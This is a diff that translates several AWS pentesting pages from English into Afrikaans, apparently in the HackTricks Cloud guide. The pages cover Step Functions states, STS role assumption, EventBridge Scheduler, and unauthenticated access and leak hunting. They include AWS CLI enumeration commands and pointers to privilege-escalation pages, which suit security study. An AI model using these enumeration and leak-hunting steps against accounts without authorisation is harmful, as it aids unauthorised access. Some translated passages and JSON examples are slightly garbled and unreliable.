+Voorbeeld van **Keuse** toestand: ```json { - "Variable": "$.timeStamp", - "TimestampEquals": "2000-01-01T00:00:00Z", - "Next": "TimeState" +"Variable": "$.timeStamp", +"TimestampEquals": "2000-01-01T00:00:00Z", +"Next": "TimeState" } ``` - ### Fail/Succeed -A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow. +'n **`Fail`** toestand stop die uitvoering van 'n toestandmasjien en merk dit as 'n mislukking. Dit word gebruik om 'n foutnaam en 'n oorsaak te spesifiseer, wat besonderhede oor die mislukking verskaf. Hierdie toestand is terminal, wat beteken dit beĂ«indig die uitvoeringsvloei. -A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field. +'n **`Succeed`** toestand stop die uitvoering suksesvol. Dit word tipies gebruik om die werksvloei te beĂ«indig wanneer dit suksesvol voltooi is. Hierdie toestand vereis nie 'n **`Next`** veld nie. {{#tabs }} {{#tab name="Fail example" }} - ```json "FailState": { - "Type": "Fail", - "Error": "ErrorName", - "Cause": "Error details" +"Type": "Fail", +"Error": "ErrorName", +"Cause": "Error details" } ``` - {{#endtab }} -{{#tab name="Succeed example" }} - +{{#tab name="Sukses voorbeeld" }} ```json "SuccessState": { - "Type": "Succeed" +"Type": "Succeed" } ``` - {{#endtab }} {{#endtabs }} ### Pass -A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it. 
- +'n **Pass** toestand gee sy invoer aan sy uitvoer oor, hetsy sonder om enige werk te verrig of deur JSON toestand invoer te transformeer met behulp van filters, en dan die getransformeerde data aan die volgende toestand oor te dra. Dit is nuttig vir toetsing en die konstruksie van toestandmasjiene, wat jou toelaat om statiese data in te voeg of dit te transformeer. ```json "PassState": { - "Type": "Pass", - "Result": {"key": "value"}, - "ResultPath": "$.newField", - "Next": "NextState" +"Type": "Pass", +"Result": {"key": "value"}, +"ResultPath": "$.newField", +"Next": "NextState" +} +``` +### Wag + +'n **Wag** toestand vertraag die uitvoering van die toestandmasjien vir 'n spesifieke duur. Daar is drie primĂȘre metodes om die wagtyd te konfigureer: + +- **X Sekondes**: 'n Vasgestelde aantal sekondes om te wag. + +```json +"WaitState": { +"Type": "Wait", +"Seconds": 10, +"Next": "NextState" } ``` -### Wait +- **Absoluut Tydstempel**: 'n Presiese tyd om te wag tot. -A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time: +```json +"WaitState": { +"Type": "Wait", +"Timestamp": "2024-03-14T01:59:00Z", +"Next": "NextState" +} +``` -- **X Seconds**: A fixed number of seconds to wait. +- **Dinamiese Wag**: Gebaseer op invoer met behulp van **`SecondsPath`** of **`TimestampPath`**. - ```json - "WaitState": { - "Type": "Wait", - "Seconds": 10, - "Next": "NextState" - } - ``` - -- **Absolute Timestamp**: An exact time to wait until. - - ```json - "WaitState": { - "Type": "Wait", - "Timestamp": "2024-03-14T01:59:00Z", - "Next": "NextState" - } - ``` - -- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. 
- - ```json - jsonCopiar cĂłdigo - "WaitState": { - "Type": "Wait", - "TimestampPath": "$.expirydate", - "Next": "NextState" - } - ``` +```json +jsonCopiar cĂłdigo +"WaitState": { +"Type": "Wait", +"TimestampPath": "$.expirydate", +"Next": "NextState" +} +``` ### Parallel -A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are: - -- **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine. -- **ResultPath**: Defines where (in the input) to place the combined output of the branches. -- **Retry and Catch**: Error handling configurations for the parallel state. +'n **Parallel** toestand laat jou toe om verskeie takke van take gelyktydig binne jou werksvloei uit te voer. Elke tak loop onafhanklik en verwerk sy eie volgorde van toestande. Die uitvoering wag totdat al die takke voltooi is voordat dit na die volgende toestand gaan. Sy sleutelvelde is: +- **Takke**: 'n Array wat die parallelle uitvoeringspaaie definieer. Elke tak is 'n aparte toestandmasjien. +- **ResultPath**: Definieer waar (in die invoer) om die saamgevoegde uitvoer van die takke te plaas. +- **Herhaal en Vang**: Fouthanteringskonfigurasies vir die parallelle toestand. ```json "ParallelState": { - "Type": "Parallel", - "Branches": [ - { - "StartAt": "Task1", - "States": { ... } - }, - { - "StartAt": "Task2", - "States": { ... } - } - ], - "Next": "NextState" +"Type": "Parallel", +"Branches": [ +{ +"StartAt": "Task1", +"States": { ... } +}, +{ +"StartAt": "Task2", +"States": { ... } +} +], +"Next": "NextState" +} +``` +### Map + +'n **Map** toestand stel die uitvoering van 'n stel stappe vir elke item in 'n dataset in staat. Dit word gebruik vir parallelle verwerking van data. 
Afhangende van hoe jy die items van die dataset wil verwerk, bied Step Functions die volgende modi aan: + +- **Inline Mode**: Voer 'n substel van toestande uit vir elke JSON-array item. Geschik vir klein skaal take met minder as 40 parallelle iterasies, wat elkeen in die konteks van die werksvloei wat die **`Map`** toestand bevat, loop. + +```json +"MapState": { +"Type": "Map", +"ItemsPath": "$.arrayItems", +"ItemProcessor": { +"ProcessorConfig": { +"Mode": "INLINE" +}, +"StartAt": "AddState", +"States": { +"AddState": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"OutputPath": "$.Payload", +"Parameters": { +"FunctionName": "arn:aws:lambda:::function:add-function" +}, +"End": true +} +} +}, +"End": true +"ResultPath": "$.detail.added", +"ItemsPath": "$.added" } ``` -### Map +- **Distributed Mode**: Ontwerp vir groot skaal parallelle verwerking met hoĂ« mededinging. Ondersteun die verwerking van groot datasets, soos diĂ© wat in Amazon S3 gestoor is, wat 'n hoĂ« mededinging van tot 10,000 parallelle kind werksvloei-uitvoerings moontlik maak, wat hierdie kinders as 'n aparte kind uitvoering loop. -A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes: - -- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. 
- - ```json - "MapState": { - "Type": "Map", - "ItemsPath": "$.arrayItems", - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "INLINE" - }, - "StartAt": "AddState", - "States": { - "AddState": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "OutputPath": "$.Payload", - "Parameters": { - "FunctionName": "arn:aws:lambda:::function:add-function" - }, - "End": true - } - } - }, - "End": true - "ResultPath": "$.detail.added", - "ItemsPath": "$.added" - } - ``` - -- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. - - ```json - "DistributedMapState": { - "Type": "Map", - "ItemReader": { - "Resource": "arn:aws:states:::s3:getObject", - "Parameters": { - "Bucket": "my-bucket", - "Key": "data.csv" - } - }, - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "DISTRIBUTED", - "ExecutionType": "EXPRESS" - }, - "StartAt": "ProcessItem", - "States": { - "ProcessItem": { - "Type": "Task", - "Resource": "arn:aws:lambda:region:account-id:function:my-function", - "End": true - } - } - }, - "End": true - "ResultWriter": { - "Resource": "arn:aws:states:::s3:putObject", - "Parameters": { - "Bucket": "myOutputBucket", - "Prefix": "csvProcessJobs" - } - } - } - ``` +```json +"DistributedMapState": { +"Type": "Map", +"ItemReader": { +"Resource": "arn:aws:states:::s3:getObject", +"Parameters": { +"Bucket": "my-bucket", +"Key": "data.csv" +} +}, +"ItemProcessor": { +"ProcessorConfig": { +"Mode": "DISTRIBUTED", +"ExecutionType": "EXPRESS" +}, +"StartAt": "ProcessItem", +"States": { +"ProcessItem": { +"Type": "Task", +"Resource": "arn:aws:lambda:region:account-id:function:my-function", +"End": true +} +} +}, +"End": true +"ResultWriter": { +"Resource": "arn:aws:states:::s3:putObject", +"Parameters": { +"Bucket": "myOutputBucket", 
+"Prefix": "csvProcessJobs" +} +} +} +``` ### Versions and aliases -Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine. +Step Functions laat jou ook toe om werksvloei-implementasies te bestuur deur middel van **versies** en **aliases** van toestand masjiene. 'n Weergawe verteenwoordig 'n snapshot van 'n toestand masjien wat uitgevoer kan word. Aliases dien as wysers na tot twee weergawes van 'n toestand masjien. -- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. -- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. +- **Versies**: Hierdie onveranderlike snapshots van 'n toestand masjien word geskep vanaf die mees onlangse hersiening van daardie toestand masjien. 
Elke weergawe word geĂŻdentifiseer deur 'n unieke ARN wat die toestand masjien ARN met die weergawe nommer kombineer, geskei deur 'n dubbelepunt (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Weergawes kan nie ge-edit word nie, maar jy kan die toestand masjien opdateer en 'n nuwe weergawe publiseer, of die gewenste toestand masjien weergawe gebruik. +- **Aliases**: Hierdie wysers kan na tot twee weergawes van dieselfde toestand masjien verwys. Meerdere aliases kan geskep word vir 'n enkele toestand masjien, elkeen geĂŻdentifiseer deur 'n unieke ARN wat die toestand masjien ARN met die alias naam kombineer, geskei deur 'n dubbelepunt (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases stel die roetering van verkeer tussen een van die twee weergawes van 'n toestand masjien in staat. Alternatiewelik kan 'n alias na 'n enkele spesifieke weergawe van die toestand masjien wys, maar nie na ander aliases nie. Hulle kan opdateer word om na 'n ander weergawe van die toestand masjien te herlei soos nodig, wat beheerde implementasies en werksvloei bestuur fasiliteer. -For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html). +Vir meer gedetailleerde inligting oor **ASL**, kyk: [**Amazon States Language**](https://states-language.net/spec.html). ## IAM Roles for State machines -AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions: +AWS Step Functions gebruik AWS Identity and Access Management (IAM) rolle om toegang tot hulpbronne en aksies binne toestand masjiene te beheer. Hier is die sleutel aspekte wat verband hou met sekuriteit en IAM rolle in AWS Step Functions: -- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. 
This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. -- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. +- **Execution Role**: Elke toestand masjien in AWS Step Functions is geassosieer met 'n IAM uitvoering rol. Hierdie rol definieer watter aksies die toestand masjien namens jou kan uitvoer. Wanneer 'n toestand masjien tussen toestande oorgaan wat met AWS dienste interaksie het (soos die aanroep van Lambda funksies, toegang tot DynamoDB, ens.), neem dit hierdie uitvoering rol aan om daardie aksies uit te voer. +- **Permissions**: Die IAM uitvoering rol moet geconfigureer word met toestemmings wat die nodige aksies op ander AWS dienste toelaat. Byvoorbeeld, as jou toestand masjien AWS Lambda funksies moet aanroep, moet die IAM rol **`lambda:InvokeFunction`** toestemmings hĂȘ. Op soortgelyke wyse, as dit na DynamoDB moet skryf, moet toepaslike toestemmings (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, ens.) toegestaan word. ## Enumeration -ReadOnlyAccess policy is enough for all the following enumeration actions. - +ReadOnlyAccess beleid is genoeg vir al die volgende enumerasie aksies. ```bash # State machines # 
@@ -310,10 +297,9 @@ aws stepfunctions describe-map-run --map-run-arn ## Lists executions of a Map Run aws stepfunctions list-executions --map-run-arn [--status-filter ] [--redrive-filter ] ``` - ## Privesc -In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **Step Functions toestemming te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -338,7 +324,3 @@ In the following page, you can check how to **abuse Step Functions permissions t - [https://states-language.net/spec.html](https://states-language.net/spec.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md index 385d55c3b..675d52d11 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md 
@@ -4,62 +4,57 @@ ## STS -**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). +**AWS Security Token Service (STS)** is hoofsaaklik ontwerp om **tydelike, beperkte bevoegdheid akkrediteerbare** te verskaf. Hierdie akkrediteerbare kan aangevra word vir **AWS Identity and Access Management (IAM)** gebruikers of vir geverifieerde gebruikers (gefedereerde gebruikers). -Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. +Aangesien STS se doel is om **akkrediteerbare vir identiteit se vervalsing** uit te reik, is die diens uiters waardevol vir **bevoegdheidstoename en volgehoue volharding**, selfs al het dit dalk nie 'n wye verskeidenheid opsies nie. ### Assume Role Impersonation -The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. +Die aksie [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) wat deur AWS STS verskaf word, is van kardinale belang aangesien dit 'n hoofrol toelaat om akkrediteerbare vir 'n ander hoofrol te verkry, wat hulle essensieel vervals. By aanroep, antwoord dit met 'n toegang sleutel ID, 'n geheime sleutel, en 'n sessie token wat ooreenstem met die gespesifiseerde ARN. 
-For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. +Vir Penetration Testers of Red Team lede, is hierdie tegniek instrumenteel vir bevoegdheidstoename (soos uitgebreider [**hier**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). Dit is egter die moeite werd om te noem dat hierdie tegniek redelik opvallend is en mag nie 'n aanvaller onbewus vang nie. #### Assume Role Logic -In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in: - +Om 'n rol in dieselfde rekening aan te neem, as die **rol om aan te neem spesifiek 'n rol ARN toelaat** soos in: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::role/priv-role" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::role/priv-role" +}, +"Action": "sts:AssumeRole", +"Condition": {} +} +] } ``` +Die rol **`priv-role`** in hierdie geval, **hoef nie spesifiek toegelaat te word** om daardie rol aan te neem (met daardie toelae is genoeg). -The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough). 
- -However, if a role is allowing an account to assume it, like in: - +Maar, as 'n rol 'n rekening toelaat om dit aan te neem, soos in: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "sts:AssumeRole", +"Condition": {} +} +] } ``` +Die rol wat probeer om aan te neem, sal 'n **spesifieke `sts:AssumeRole` toestemming** oor daardie rol **nodig hĂȘ om dit aan te neem**. -The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. - -If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). +As jy probeer om 'n **rol** **van 'n ander rekening** aan te neem, moet die **aangenome rol dit toelaat** (wat die rol **ARN** of die **eksterne rekening** aandui), en die **rol wat probeer om die ander een aan te neem** **MOET** **toestemmings hĂȘ om dit aan te neem** (in hierdie geval is dit nie opsioneel nie, selfs al spesifiseer die aangeneemde rol 'n ARN). ### Enumeration - ```bash # Get basic info of the creds aws sts get-caller-identity @@ -72,10 +67,9 @@ aws sts get-session-token ## MFA aws sts get-session-token --serial-number --token-code ``` - ### Privesc -In the following page you can check how to **abuse STS permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **STS-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-sts-privesc.md 
@@ -98,7 +92,3 @@ In the following page you can check how to **abuse STS permissions to escalate p - [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md index a2f2e0c2f..daf55551a 100644 --- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md 
@@ -6,49 +6,48 @@ ## EventBridge Scheduler -**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. +**Amazon EventBridge Scheduler** is 'n volledig bestuurde, **serverless scheduler wat ontwerp is om take te skep, te loop, en te bestuur** op skaal. Dit stel jou in staat om miljoene take oor meer as 270 AWS-dienste en 6,000+ API-operasies te skeduleer, alles vanuit 'n sentrale diens. Met ingeboude betroubaarheid en geen infrastruktuur om te bestuur nie, vereenvoudig EventBridge Scheduler skedulering, verminder onderhoudskoste, en skaal outomaties om aan die vraag te voldoen. Jy kan cron of tariefuitdrukkings konfigureer vir herhalende skedules, eenmalige aanroepings stel, en buigsame afleweringsvensters met herhalingsopsies definieer, wat verseker dat take betroubaar afgelewer word gebaseer op die beskikbaarheid van afwaartse teikens. -There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." +Daar is 'n aanvanklike limiet van 1,000,000 skedules per streek per rekening. Selfs die amptelike kwotas bladsy stel voor, "Dit word aanbeveel om eenmalige skedules te verwyder sodra hulle voltooi is." -### Types of Schedules +### Tipes Skedules -Types of Schedules in EventBridge Scheduler: +Tipes Skedules in EventBridge Scheduler: -1. 
**One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. -2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. -3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. +1. **Eenmalige skedules** – Voer 'n taak uit op 'n spesifieke tyd, bv. 21 Desember om 7 VM UTC. +2. **Tarief-gebaseerde skedules** – Stel herhalende take in op 'n frekwensie, bv. elke 2 uur. +3. **Cron-gebaseerde skedules** – Stel herhalende take in met 'n cron-uitdrukking, bv. elke Vrydag om 4 NM. -Two Mechanisms for Handling Failed Events: +Twee Meganismes vir die Hantering van Mislukte Gebeure: -1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. -2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target. +1. **Herhalingsbeleid** – Definieer die aantal herhalingspogings vir 'n mislukte gebeurtenis en hoe lank om dit onverwerk te hou voordat dit as 'n mislukking beskou word. +2. **Doodbriefmandjie (DLQ)** – 'n Standaard Amazon SQS-mandjie waar mislukte gebeurtenisse afgelewer word nadat herhalings uitgeput is. DLQ's help om probleme met jou skedule of sy afwaartse teiken op te los. -### Targets +### Teikens -There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. 
+Daar is 2 tipes teikens vir 'n scheduler [**templatet (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), wat algemeen gebruik word en AWS het dit makliker gemaak om te konfigureer, en [**universel (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), wat gebruik kan word om enige AWS API aan te roep. -**Templated targets** support the following services: +**Templated teikens** ondersteun die volgende dienste: - CodeBuild – StartBuild - CodePipeline – StartPipelineExecution - Amazon ECS – RunTask - - Parameters: EcsParameters +- Parameters: EcsParameters - EventBridge – PutEvents - - Parameters: EventBridgeParameters +- Parameters: EventBridgeParameters - Amazon Inspector – StartAssessmentRun - Kinesis – PutRecord - - Parameters: KinesisParameters +- Parameters: KinesisParameters - Firehose – PutRecord - Lambda – Invoke - SageMaker – StartPipelineExecution - - Parameters: SageMakerPipelineParameters +- Parameters: SageMakerPipelineParameters - Amazon SNS – Publish - Amazon SQS – SendMessage - - Parameters: SqsParameters +- Parameters: SqsParameters - Step Functions – StartExecution -### Enumeration - +### Enumerasie ```bash # List all EventBridge Scheduler schedules aws scheduler list-schedules @@ -65,10 +64,9 @@ aws scheduler get-schedule-group --name # List tags for a specific schedule (helpful in identifying any custom tags or permissions) aws scheduler list-tags-for-resource --resource-arn ``` - ### Privesc -In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **eventbridge scheduler toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/eventbridgescheduler-privesc.md 
@@ -79,7 +77,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md index 0003290b4..b086ce9cf 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md 
@@ -1,58 +1,54 @@ -# AWS - Unauthenticated Enum & Access +# AWS - Ongeauthentiseerde Enum & Toegang {{#include ../../../banners/hacktricks-training.md}} -## AWS Credentials Leaks +## AWS Kredensiaal Lekke -A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ -Some useful **tools**: +'n Algemene manier om toegang of inligting oor 'n AWS-rekening te verkry, is deur **lekke te soek**. Jy kan lekke soek deur **google dorks**, die **openbare repos** van die **organisasie** en die **werkers** van die organisasie in **Github** of ander platforms te kontroleer, in **kredensiaal lekke databasisse** te soek... of in enige ander deel waar jy dink jy dalk inligting oor die maatskappy en sy wolk infrastruktuur kan vind.\ +Sommige nuttige **gereedskap**: - [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) - [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) - [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) -## AWS Unauthenticated Enum & Access +## AWS Ongeauthentiseerde Enum & Toegang -There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: +Daar is verskeie dienste in AWS wat geconfigureer kan word om 'n soort toegang aan die hele internet of aan meer mense as verwag te gee. 
Kyk hier hoe: -- [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) -- [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -- [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) -- [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -- [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) -- [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) -- [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) -- [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) -- [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) -- [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) -- [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) -- [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) -- [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) -- [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) -- [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) -- [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) -- [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) -- [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) +- [**Rekeninge Ongeauthentiseerde Enum**](aws-accounts-unauthenticated-enum.md) +- [**Cloud9 Ongeauthentiseerde Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cloudfront Ongeauthentiseerde Enum**](aws-cloudfront-unauthenticated-enum.md) +- [**Cloudsearch Ongeauthentiseerde 
Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cognito Ongeauthentiseerde Enum**](aws-cognito-unauthenticated-enum.md) +- [**DocumentDB Ongeauthentiseerde Enum**](aws-documentdb-enum.md) +- [**EC2 Ongeauthentiseerde Enum**](aws-ec2-unauthenticated-enum.md) +- [**Elasticsearch Ongeauthentiseerde Enum**](aws-elasticsearch-unauthenticated-enum.md) +- [**IAM Ongeauthentiseerde Enum**](aws-iam-and-sts-unauthenticated-enum.md) +- [**IoT Ongeauthentiseerde Toegang**](aws-iot-unauthenticated-enum.md) +- [**Kinesis Video Ongeauthentiseerde Toegang**](aws-kinesis-video-unauthenticated-enum.md) +- [**Media Ongeauthentiseerde Toegang**](aws-media-unauthenticated-enum.md) +- [**MQ Ongeauthentiseerde Toegang**](aws-mq-unauthenticated-enum.md) +- [**MSK Ongeauthentiseerde Toegang**](aws-msk-unauthenticated-enum.md) +- [**RDS Ongeauthentiseerde Toegang**](aws-rds-unauthenticated-enum.md) +- [**Redshift Ongeauthentiseerde Toegang**](aws-redshift-unauthenticated-enum.md) +- [**SQS Ongeauthentiseerde Toegang**](aws-sqs-unauthenticated-enum.md) +- [**S3 Ongeauthentiseerde Toegang**](aws-s3-unauthenticated-enum.md) -## Cross Account Attacks +## Kruisrekening Aanvalle -In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. +In die praatjie [**Breek die Isolasie: Kruisrekening AWS Kw vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) word aangebied hoe sommige dienste enige AWS-rekening toegelaat het om toegang tot hulle te verkry omdat **AWS dienste sonder om rekening ID's te spesifiseer** toegelaat is. 
